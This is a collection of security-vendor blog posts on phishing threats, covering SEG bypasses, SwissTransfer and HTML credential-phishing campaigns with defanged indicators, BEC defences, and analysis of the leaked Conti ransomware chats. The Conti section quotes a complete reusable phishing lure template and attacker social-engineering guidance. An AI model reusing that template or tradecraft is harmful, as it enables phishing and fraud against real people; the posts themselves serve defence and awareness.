SEG Effectiveness: Three Takeaways from the 2022 State of Phishing Report

Author: Tonia Dudley

Earlier this year, Cofense released its 2022 Annual State of Phishing Report highlighting insights and analysis seen in customer environments. One major takeaway, the amount of phish that continue to bypass Secure Email Gateways (SEGs). To provide more insights on this topic, Cofense CTO & Co-Founder, Aaron Higbee, and myself sat down to go in-depth and highlight findings on SEG misses.

While organizations analyze data across industries to see how they compare against peers, we also recommend you compare your organization against your technology stack. As you tune your security controls and SEG, are you able to detect and respond to new threats as they land in the inbox?

Figure 1: New Behavior for QakBot

Key Takeaway #1: Threat Actors tune their tactics.

As SEGs tune for file attachment threats, which continues to show low inbox hits, Cofense continues to see new file attachment types used to bypass the SEG. These odd file types may appear obscure to your user surfing their inbox, but often times these odd file types are very much still recognized by native Microsoft Windows endpoints. Along with odd file types, we stay abreast of new behavior tactics used by threat groups. The email in Figure 1 is related to the known QakBot malware family, but this particular campaign switched their tactic by directing the recipient to click the link that is a download of a zip file. However, when the recipient interacts with this zip file and extracts the .MSI file, QakBot is then launched onto the device.

Key Takeaway #2: The top file attachment type landing in the inbox.

Threat actors continue to leverage the one file type they know will land in the inbox and likely get engagement from the recipient – HTML / HTM files. This file type can be difficult to mitigate by configuring a hard block as many legitimate business applications or SaaS solutions use this file type. Look for ways to mitigate this risk by working with the business owners to identify the recipient population that need to receive these emails. Then provide resources that allow your users to validate a legitimate service that send this file type. The best way to condition and prepare your organization to identify and report this threat is to use this file type in simulation phishing campaign.

Key Takeaway #3: Microsoft updated Office file types – did you?

Not only are odd file types being leverage, but what about file types that have been sunset. I don’t know about you, but I’m not sure the last time I used an MS Office product that didn’t add the ‘x’ to file extension (.xlsx or .docx). This can be a simple configuration to add these to archived file types to your block list and minimize the risk of these files landing in the inbox.

As we closed out the discussion on odd file types and opened the floor for questions, we received a question that has been a discussion point lately as organizations are looking to focus their phishing defense programs.

What are you using to measure the effectiveness of your phishing defense program?

Tune into the recording for our summary and stay tuned as we publish more recommendations on this topic.

Threat actors are continuing to use emerging tactics and techniques to bypass traditional email security solutions and the only way to stay ahead of the curve is to have a comprehensive phishing defense strategy. If you’re interested in a more detailed analysis of SEG effectiveness, BEC insights or catching ransomware at the phishing stage, sign up for our upcoming webinars.

Hackers Utilize SwissTransfer To Deploy Phishing Scam

Author: Kian Maher

In recent weeks, the Cofense Phishing Defence Center (PDC) has noted a number of emails utilising the SwissTransfer service to achieve successful phishes against recipients. A common vector and preferred vector for attackers, file sharing services such as WeTransfer, Microsoft OneDrive and Dropbox have been utilized to spread files containing anything from scams to malware leading to ransomware.

Figure 1: Phishing Email

Based in Switzerland, this file sharing service has been seen mostly in attacks against users of German speaking nations. The file sharing capabilities and clean image of the site can easily trick a user into downloading a file they believe is legitimate and from a known contact; however, with the ability to add any alias to a sent file, impersonation becomes exceedingly easy.

Navigating to the link on the email will present the user with a legitimate SwissTransfer download page where a PDF file named “Portfolio Control GmbH.pdf” can be downloaded by the user, as seen in Figure 2.

Figure 2: File Download Page

Once the file has been downloaded, and the recipient opens the PDF, clicking on the link will redirect the user to a Microsoft login page.

Figure 3: PDF Document

The login page spoofs the standard Microsoft layout and the only indicator that something is amiss is the URL seen in the address bar.

Figure 4: Landing Page

Beware of emails coming from legitimate services such as SwissTransfer, WeTransfer and Microsoft OneDrive, as phishing attacks are constantly evolving and are becoming more convincing and complex by the day. Equally as important is to ensure the same password is never used for more than one account. Additionally, never perform any password resets or account retrievals outside of the legitimate website of any email provider you use or through a corporate environments’ approved methods.

Malicious emails like this are a constant threat in the enterprise space due to constant use of services such as Microsoft Outlook and it is important that users are made aware of this so that they can be more vigilant when receiving emails. With Cofense suite of products and services, malicious emails can be identified, and indicators of compromise (IOC)’s given and shared. Find out what we can do for your enterprise.

IOC IP
hXXps://www[.]swisstransfer[.]com/d/3835eb76-db5c-4e5a-9aa6-044bac8b46ce 185.125.25.5
hXXps://microsoftonline[.]gonset-holdings[.]ch/common/oauth2/v2.0/authorize 190.123.44.153
64.98.145.30

Cofense Earns 2022 Top Rated Award from TrustRadius

Cofense PhishMe recognized for Security Awareness Training category based on excellent customer satisfaction ratings

Leesburg, Va. – May 19, 2022Cofense®, the leading provider of Phishing Detection and Response (PDR) solutions, today announced that Cofense PhishMe™ has won a 2022 Top Rated Award by TrustRadius in the security awareness training software category. Top Rated awards help distinguish products that have excellent customer satisfaction ratings and are based entirely on end user reviews.

Current events highlight that mature and effective phishing defense programs must be proactive and constant, as phishing continues to be a key entry point for a majority of cyber attacks. As employees are the front line of defense against phishing, training for employees is one of the most effective ways to strengthen your company’s defense against attacks such as ransomware, malware and Business Email Compromise (BEC). When it comes to preparing and conditioning users to spot and report phish hitting their inbox, the 2022 Cofense Annual State of Phishing Report highlighted a two-point increase in resiliency rate for simulation campaigns and saw a seven-point resiliency rate among organizations that have full phishing defense programs.

“Email threats are not going anywhere. In fact, it’s quite the opposite; they’re only getting worse and continue to dominate as the primary vector behind most data breaches. Threat actors are continuing to use emerging tactics and techniques to bypass email security technologies and the only way to stay ahead of the curve is to have a comprehensive email defense strategy,” said Rohyt Belani, CEO of Cofense. “An effective email defense program operates at the intersection of human intelligence and artificial intelligence. A critical mass of vigilant humans who report suspicious emails are critical to feed machine learning powered technologies so the latter can continually evolve and create a self-healing email security system. Security training or email security technologies in isolation are not going to work.”

Cofense PhishMe, a SaaS platform trusted by over 2,500 organizations across multiple industry verticals, uses intelligent automation, advanced algorithms and active threat scenarios to reinforce positive security awareness behavior. The training brings real, active threats into realistic phishing scenarios to ensure program relevance and to provide users with insights that can help them to navigate the modern threat landscape.

To qualify for a Top Rated award, a product must have 10 or more recent reviews from the past year, a trScore of 7.5 or higher based on TrustRadius’ algorithm that calculates a product’s scores based on a weighted average of reviews and ratings, and show relevance by having earned at least 1.5% of the site traffic in the category. Cofense’s TrustRadius reviews can be viewed here.

To learn more about Cofense, please visit www.cofense.com.

About Cofense

Cofense® is the leading provider of phishing detection and response solutions. Designed for enterprise organizations, the Cofense Phishing Detection and Response (PDR) platform leverages a global network of over 32 million people actively reporting suspected phish, combined with advanced automation to stop phishing attacks faster and stay ahead of breaches. When deploying the full suite of Cofense solutions, organizations can educate employees on how to identify and report phish, detect phish in their environment and respond quickly to remediate threats. With seamless integration into most major TIPs, SIEMs, and SOARs, Cofense solutions easily align with existing security ecosystems. Across a broad set of Global 1000 enterprise customers, including defense, energy, financial services, healthcare and manufacturing sectors, Cofense understands how to improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

Phishing Takeaways from the Conti Ransomware Leaks – Part 3

Author: Brad Haas

Conti is one of the most prolific ransomware operations in the threat landscape today. In a recent act of retaliation against Conti’s leaders for their support of Russia, an anonymous person leaked documentation and internal chat logs from the group. This blog post series covers important phishing-related takeaways Cofense Intelligence analysts discovered in the leaks. In Part 3, we discuss elements of Conti’s phishing tactics and strategy.

Conti Produces Semi-Random Phishing Templates Using Simple Themes

Although the Conti group employs other malware operators to perform the work of sending malicious emails, it appears that the group provides the templates to use in the emails. Several English-language templates were included in the leaked Jabber chats, indicating a system that randomly chooses words or phrases from short lists. The templates included text that could produce a variety of wordings for email subject lines and bodies, along with a list of attachment names to choose from. Conti member “Lemur” contributed the following order-themed template in October:

lemur:

{Greetings|Hello|Good day|Good afternoon}{!|,|}

{Thank you for|We are grateful for|We are grateful for|Many thanks for} {your|your recent} {online order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} TRANSFER NUMBER. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}.

{Total|Full|Whole} {order|purchase|payment} SUM

You {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} CHECK NUMBER {in|in the} {attached file|file attached}.

{Thank you!|Have a nice day!}

Subjects: Your {order|purchase|online order|last order} Purchase order number payment {processed|obtained|received}

Attachments:

ord_conf

full.details

compl_ord_7847

buyer_auth_doc

info_summr

customer_docs

spec-ed_info

Dozens of other templates appeared in the chat, with themes including invoices, shipping, payment processing, legal matters, and other business-centered subjects. In a TrickBot chat exchange, two team members discussed a more personal template impersonating a woman looking for a relationship. They went through several revisions, even incorporating feedback from an English teacher.

Conti Actively Develops and Tests Email Delivery Tactics

The spammers who work in and with the Conti organization showed familiarity with automated defenses against malicious email campaigns. In November 2021, “wind” discussed a way to abuse browser-centric email providers to send malicious emails:

wind: […] it will be necessary to create thousands of such docker containers and send only 10 letters from each mail account, sent by an AI emulator with mouse movements simulating human ones. Every mailer now has an AI, it recognizes all the movements in the browser, and their AI will just laugh out loud at the get requests to send hundreds of thousands of emails.

Another message from April 2021 shows an operator testing their emails on webmail platforms Gmail, Yahoo, Outlook, Mail.com, and AOL Mail. They included screenshots showing that an Apple-spoofing email had arrived in each of the inboxes.

A test of an Apple-spoofing email in a Mail.com inbox. The inbox includes several other test emails.

Phishing is Central to Conti’s Attack Strategy

Conti operators consider humans to be an effective target, and phishing is their mechanism for exploiting the human target surface with social engineering. Their “Hacker’s Quick Start” document lists dozens of OSINT sources to use, singling out people as “the weakest link.” The reference to “previously opened networks” indicates a repository of already-compromised data that can be leveraged against new targets.

Next, we look for the weakest link (see below).

Social engineering requires knowledge of personalities.

Everything is important: phone numbers, place of residence, dog’s name, hometown, favorite color, favorite band, hobbies.

Of particular importance: your candidate’s personal network of contacts, especially business contacts.

The structure of organizations reflects the structure of society.

As you move from one person to another through a network of contacts, you can change your entry point within one network, or open up new networks.

Both OSINT intelligence tools are used to gather information,

and information found in previously opened networks about contacts (Outlook address books, correspondence, etc.).

[…]

This data is then used either through phishing emails or phone calls.

In both cases, the load is triggered by a person.

Some of our previous takeaways highlight Conti operators’ consistency in dropping ineffective tactics and persisting with effective ones:

• TrickBot was effective enough for them to enjoy a tremendous amount of success early on, but when it started to cause too many problems, they shifted to other malware families.

• Despite all the attention, they used the BazarCall campaigns, knowing that the invoice theme would likely continue to succeed.

• They went to the trouble of bringing Emotet back, likely because it had been such a significant source of infections for them prior to its takedown.

This pragmatic approach accentuates the value that ongoing phishing activity must be providing to Conti operations. Given all of Conti’s investment in OSINT, email operations, and reviving Emotet distribution, phishing is clearly one of the group’s most important tactics, and it will likely be a staple for the group in the foreseeable future.

For more insights on Conti ransomware operations:

Phishing Takeaways from the Conti Ransomware Leaks – Part 1

Phishing Takeaways from the Conti Ransomware Leaks – Part 2

5 Tips to Thwart Business Email Compromise (BEC) Attacks

Author: Ronnie Tokazowski

For the 7th year in a row, Business Email Compromise (BEC) is the number one cybercrime, as reported by losses, according to the FBI IC3 Report. Topping in at an astonishing $43 billion dollars with victims in 177 countries and money being wired between 140 different countries, it still amazes me that people are more concerned about ransomware and nation-state attacks instead of murderous BEC actors killing in the name of evil spirits.

To add insult to injury, the same actors behind BEC are responsible for $100 billion in SBA fraud and $80 billion in paycheck protection plan (PPP) fraud. This doesn’t even begin to touch the dozens of consumer-based crimes such as check fraud, advanced-fee fraud, or romance scams, with over $223 billion now tied back to the exact same scammers.

And that’s just what we know.

Reflecting on the seven years of tracking BEC, there’s one major lesson that organizations fail to do. It has nothing to do with a shiny box, has nothing to do with buying or selling a service. It’s literally reviewing what you already have.

Here’s your BEC checklist that will mitigate 80% of attacks:

  • Review your financial processes and procedures
  • Define how wire transfers, gift card purchases, and direct deposit requests work
  • Once defined, communicate & follow the process

Most BEC attacks are successful simply because a process breaks down. Someone wired money without checking if they should, a random phone number led to gift cards being sent out, or HR made a one-time exception to update payroll via email instead of pointing employees back to employee portals. The 80% solution to mitigating many types of BEC attacks is simple: review your processes around how wire transfers, authorizations to vendor master bank account updates, money orders, gift cards, and invoices are to be paid and follow them.

Here are five tips to get you started on which processes need to be updated:

  1. Maintain a list of known and trusted phone numbers to verify wire transfer requests.
  2. Don’t accept payroll update requests via email. Point users to employee portals to make the changes there.
  3. Establish a gift card purchasing process, and if no one needs to purchase gift cards for the company…then no one purchases gift cards.
  4. Bank accounts rarely change, so clearly define what bank accounts can be used at the beginning of any business relationship. If an account needs to be changed and updated, who is responsible for verifying the new account with an external party? Implement a freeze period to the account update to ensure the bank can verify ownership details.
  5. What is the process for wiring $10,000 / $50,000 / $100,000+ dollars out of the organization? Define and follow a multi-person process to verify transactions before money gets lost.

While updating processes won’t cover every single BEC use case, a vast majority of attacks can be thwarted with these simple changes. Is it better to take a week to do the boring work of reviewing your processes and procedures or be an unhappy part of the $223 billion dollar statistic?

If you want to learn more about BEC statistics that we observed in 2021, as well as ways to mitigate this attack, sign up for our next webinar focused solely on BEC attacks.

10 Enhancements to the Cofense Triage and ServiceNow Security Incident Response Integration

Is phishing still keeping you up at night?

Do disparate systems and switching screens to analyze and respond to phishing frustrate you?

Or, what about excessive phishing alerts that could be better solved through automation?

Over a year ago, Cofense built an integration with ServiceNow® Security Incident Response (SIR). The purpose: integrate Cofense Triage™ and ServiceNow SIR to create security incidents in SIR and allow an analyst to analyze and investigate employee-reported suspicious emails in either platform. The integration was well-received for the first version, and since then, Cofense Triage has added new capabilities that have been extended to ServiceNow SIR.

Creating a security incident at the cluster-level, responding to reporters, and downloading email artifacts, are just a few features that have been added to the next version of the integration, and then some!

Mutual customers operating Cofense Triage 1.24 can integrate with ServiceNow’s Quebec, Rome, or San Diego releases.

The foundation of the integration is still the same.

  • Configure authentication (Triage Host, Client ID, Client Secret, and MID Server (optional)
  • Define incident criteria that creates an SIR entry in ServiceNow.

Incident Criteria Configuration to Create Entries in SIR

Let’s look at the 10 enhancements built into this integration.

1. Clusters: Create security incidents based on cluster criteria

Cofense Triage clusters multiple reported emails. ServiceNow can then ingest Clusters based on criteria and create one security incident. For example, 5 reported emails bound to one Cofense Triage cluster, can create one security incident in ServiceNow SIR.


Security Incident Created from a Cluster

2. Reports: Ingest reports associated with clusters

When multiple reports are present in a cluster, analysts can choose to fetch all the reports from the cluster if they choose. Each report carries the relationship with the cluster and SIR record.

Fetched Reports Associated with a Cluster and Linking to SIR

3. Fetched Reports Associated with a Cluster and Linking to SIR

Want to add the original email to the SIR? ServiceNow can download the full email(s) as .eml

Report Downloaded as .eml File

4. Attachments: Download attachments from reported emails

Attachments can be downloaded on demand and packaged into the SIR for additional analysis and research.

Download Attachment Capability for Additional Analysis

5. Relationships: Links between security incident and other reports

In addition to getting all reports, SIR will link and show the relationship between a cluster and reports.

Fetched Reports Linking to SIR

6. Fetched Reports Linking to SIR

Execute a playbook to categorize reports, single or multiple, from a cluster within ServiceNow SIR.

Categorize Reports as Malicious or Non-Malicious

7. Execute Playbooks to: Respond to Reporters and teams/groups

It’s important to keep reporters informed so that they continue to report suspicious emails that evade SEGs. Choose from various notification templates ingested from Cofense Triage into SIR so that specific responses can be sent to reporters and cybersecurity and IT team members.

Response to Reporters and Team Members

8. Execute Playbooks to: Apply tags to reports

When executing a playbook, tag reports in Triage to help security analysts keep track of various reports and workflow being conducted.

Add Tags When Processing and Executing Playbooks

9. Comments: Get comments from reports

Cofense’s Managed Phishing Detection and Response service uses report comments that provide clients with other threat indicators associated with a reported email. These are typically indicators that are not visible in the email, but if clicked, redirect to other nefarious sites or link to more malware.

Sample Comments with Other Indicators From Reported Email

10. Threat Indicators: Get more threat indicators from reports

Analysts designating threat indicators across URLs, domains, and attachments in Cofense Triage, can set them to Malicious, Suspicious, or Benign. ServiceNow will ingest these indicators to be used in additional operational workflow. Additionally, other observables in Cofense Triage, such as headers, are populating SIR’s observable table, too.

Suspicious Hash Threat Indicator Finding

 

Benign Domain Threat Indicator Finding

 

Malicious URL Threat Indicator Finding

Cofense Triage and ServiceNow SIR are more tightly integrated to allow security teams to create a unified workflow that leverages the power of both platforms. By determining criteria to create an incident, security teams can ingest, prioritize, and close security incidents without flipping back and forth between screens.

Phishing Takeaways from the Conti Ransomware Leaks – Part 2

Author: Brad Haas

Conti is one of the most prolific ransomware operations in the threat landscape today. In a recent act of retaliation against Conti’s leaders for their support of Russia, an anonymous person leaked documentation and internal chat logs from the group. This blog post series covers important phishing-related takeaways Cofense Intelligence analysts discovered in the leaks. In Part 2, we discuss Conti’s collaboration with other malware groups, as well as their reaction to scrutiny from security researchers.

Conti-Emotet Link Cemented

When Emotet resurfaced in November 2021, some cybersecurity researchers reported that it was at the behest of Conti leadership. The leaked Conti logs confirm the collaboration, as Emotet’s primary operator was present in Conti chats using the alias “Veron” and in TrickBot forum chats as “Aron.” An exchange from the TrickBot forum chat establishes his identity:

[14.01.22 10:08:50] angelo: who is Veron ?

[14.01.22 10:09:07] manuel: veron )) Well, he’s [Emotet]

[…]

[14.01.22 10:09:58] angelo: but [Emotet]

[14.01.22 10:10:11] angelo: I thought it was aron

[…]

[14.01.22 10:11:33] manuel: yes in our [chat] it is

On February 24, 2021—less than a month after the law enforcement takedown of Emotet—Conti members discussed his joining them:

stern: Is veron up and running?

bentley: He starts in March.

Veron was active in the chat starting in early March 2021, with many messages corroborating cybersecurity reporting on Emotet activity and its cooperation with Conti. For example, on November 23 he discussed the use of Windows App Installer packages as a delivery mechanism. Within a week, Emotet emails started to include links to those packages.

Starting in December, Emotet occasionally installed Cobalt Strike payloads, which matches Conti’s tactics. This represents a combination of two very significant phishing threats: Emotet’s massive installation base and email sending power could give Conti operators access to more victims than ever.

TrickBot is Virtually Defunct, Superseded by BazarBackdoor and Emotet

Like Emotet, TrickBot started as a banking trojan, but evolved to a more general-purpose malware family serving other groups. Conti operators used it heavily, but found that it had unnecessary features that increased risk of detection by target organizations. In May 2021, high-ranking Conti member “Stern” suggested trimming away the extra functionality:

stern: let’s modify the trick, remove the excess

stern: we don’t really need the admin logpost etc.

In the same conversation, he highlighted that its role was to enable Conti operators to explore a target network using Cobalt Strike:

stern: he says that bots don’t connect, and if they do, it’s hard to bring them to cobalt later

In a later exchange, “Mango” expressed difficulty getting a prospective team member to work with it.

mango: they’re ready. i offered them a job on trick.

mango: they said that trick is dirty s*** that no one supports

mango: I justified myself as best I could, but it’s hard to argue, of course

TrickBot has been virtually absent from the phishing threat landscape since Emotet started sending email again in November 2021. Based on frequent mentions in the chat logs, Conti operators favored BazarBackdoor as an alternative. Emotet’s major growth in February 2022 also likely provides Conti with ample opportunities to replace the functionality provided by TrickBot.

Conti Actors Stick With Effective TTPs Despite Public Scrutiny

One of the leaked internal documents is a “Hacker’s Quick Start” guide, with basic guidance concerning all aspects of Conti operations. It ends with a note instructing new employees to pay attention to the work of cybersecurity researchers, but not to let it discourage them:

Analyzing open sources about your activities is important: you will know the part of the tricks that have already been uncovered, and therefore they have become ineffective.

However, you do not know the part of the tricks that have not been disclosed. For the sake of this, the adversary may launch disinformation, concealment, and deception.

Chat logs and real-world Conti activity show that the group takes this advice seriously. In April 2021, Cofense reported on new BazarBackdoor campaigns (also called “BazarCall”) that used unique tactics, including the use of a telephone call center. Other cybersecurity researchers picked up the story as well, including one who recorded his phone conversation and published it on YouTube. Conti members noticed the attention, but didn’t believe it would impact their operations:

derek: here’s more interesting stuff – [researcher] called us, it shows all how the infection looks https://www.youtube.com/watch?v=uAkeXCYcl4Y

stern: hi, great

derek: but I think it won’t affect the job much as the invoice theme is still alive and guys are still just spamming and making bots

Later in the year, they did proceed with using BazarCall to deploy their ransomware, despite the published research. DFIR Report researchers showed how a BazarCall campaign followed the Conti playbook: it installed TrickBot, which collected information and then executed Cobalt Strike. Within three days, the threat actors had gained sufficient access to execute Conti’s ransomware across the domain.

Similarly, despite the leaks’ exposure of a massive amount of internal chats and information, Conti is still moving forward with ransom operations. On March 15, 2022, they announced another victim on their public website.

Up Next

This blog series will conclude with Part 3, which will cover more of Conti’s phishing strategy and tactics. If you missed the first blog in this series, we discussed the background of the leaks, Conti’s segmentation of the attack chain, and how Conti operators use OSINT to select and harass their targets.

Energy/Infrastructure Enterprises Targeted by HTML Phishing Campaign

By Matthew Dortch, Cofense Phishing Defense Center

Commonly used, yet still effective tactics, are being exploited by threat actors to get phish into user’s email inboxes. The Cofense Phishing Defense Center (PDC) has observed a phishing campaign targeting energy/infrastructure companies by utilizing HTML attachments containing credential stealing forms. This is another example of how Cofense observes phishing campaigns across various customers and industries.

Figure 1: Email Body

The email shown in Figure 1, poses as a notification of a legitimately received file presented as a transcript. The threat actor leveraged a simple transcript alert theme. Specific details added in the email such as the date and time the attachment was received may boost the authenticity of the phish. To portray as being from an internal source, the threat actor spoofed the organization by using “Shared-Files via ”, however, the email address, with a Japanese domain, is still clearly displayed.

Figure 2: Phishing Page

After downloading and opening the HTML file, users are shown a Microsoft login form with some type of document masqueraded behind, shown in Figure 2. The document behind appears to be an invoice with financial information on it that can only be accessed by logging in with a Microsoft account. This tactic alone was most likely an indicator to the recipient that the email content didn’t align with what was being presented on the landing page, leading them to quickly report the suspicious email. The recipient’s email address is automatically displayed with just the password field empty, as the threat actor scripted the HTML file to have to pass the recipient’s email address.

Since one of these customers hit by this campaign leverages Cofense Vision to automatically quarantine emails, the customer was able to mitigate the email from 40 unique inboxes, reducing the risk of user interaction to give away credentials.

Cofense continues to observe HTML / HTM attachments as the top attachment type making it to the inbox, leading to credential theft. Cofense Vision sits post SEGs and offers an effective and unique phishing defense by using a network of people reporting suspicious emails that allows one email to be used to mitigate an attack across an entire organization. Reach out to learn more.

Indicators of Compromise IP
hXXps://warrenlawomaha[.]com/scn/hope.php 103.125.218.44

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

BEC: CEO Gift Card Scams

Author: Tonia Dudley

Over the years we’ve seen the evolution of topics and content related to Business Email Compromise, CEO Fraud or whatever you want to label this category of phishing. We like to just call it what it is – conversational phishing – no links or attachments – just trying to get the recipient to interact in a conversation leading to a task. The threat actor is constantly adjusting their lure and context to avoid any AI/ML detection configuration. As of late their tactic is to quickly move the conversation to another communication channel – SMS or WhatsApp for example.

I was recently catching up with a friend and as we wrapping up our conversation, she said “oh speaking of cybersecurity, I had this really strange email yesterday.” I knew exactly where she was going with this conversation and just allowed her to tell me her story. As you read her story, keep in mind that she is a C-Suite executive reporting directly to the CEO, that has only been in her role for a month. It went something like this:

As she was wrapping up her Friday, she did one last check of her email on another platform used by a peer organization. She saw an email from her CEO asking for her cell. At first glance, she knew he was on a personal vacation and maybe he only took his personal cell with him, and he didn’t have my cell phone number. She quickly reached out to her peer, but no response – it was late Friday afternoon – nor did Mark respond when she texted him.

Figure 1: Phishing Email

Since she couldn’t get ahold of anyone to validate, she responded and began the text exchange in Figures 2-5. And then headed off to buy the requested gift cards. As you can see in the exchange, it’s clear she thought she was chatting with Mark and making every effort to meet the demands of the request. As she made the final step to text a picture of the code, she decided to do one last check with her CEO. It was then that she decided to try one last time to call him directly. He explained to her that he is on vacation and would never ask her to buy gift cards. While she had scratched off the cover to get the code – in the parking lot after making the purchase – she was able to walk back into the store and get a refund of her personal money.

 

 

Figure 2-5: SMS Message Exchange

In this scenario, Ruth was lucky to be able to get a refund for the purchase she just made, many are not. Because the dollar amount of these losses tends to be low cost, very rarely are these reported to law enforcement.

In our Annual Report webinar series, we break down the various types of tactics seen in these scams and how these have evolved. We also cover some ways that you can protect your organization by making your employees aware of these tactics. On May 25, we will be providing in-depth insights on BEC and best practices on how to educate your employees to prevent situations like the above.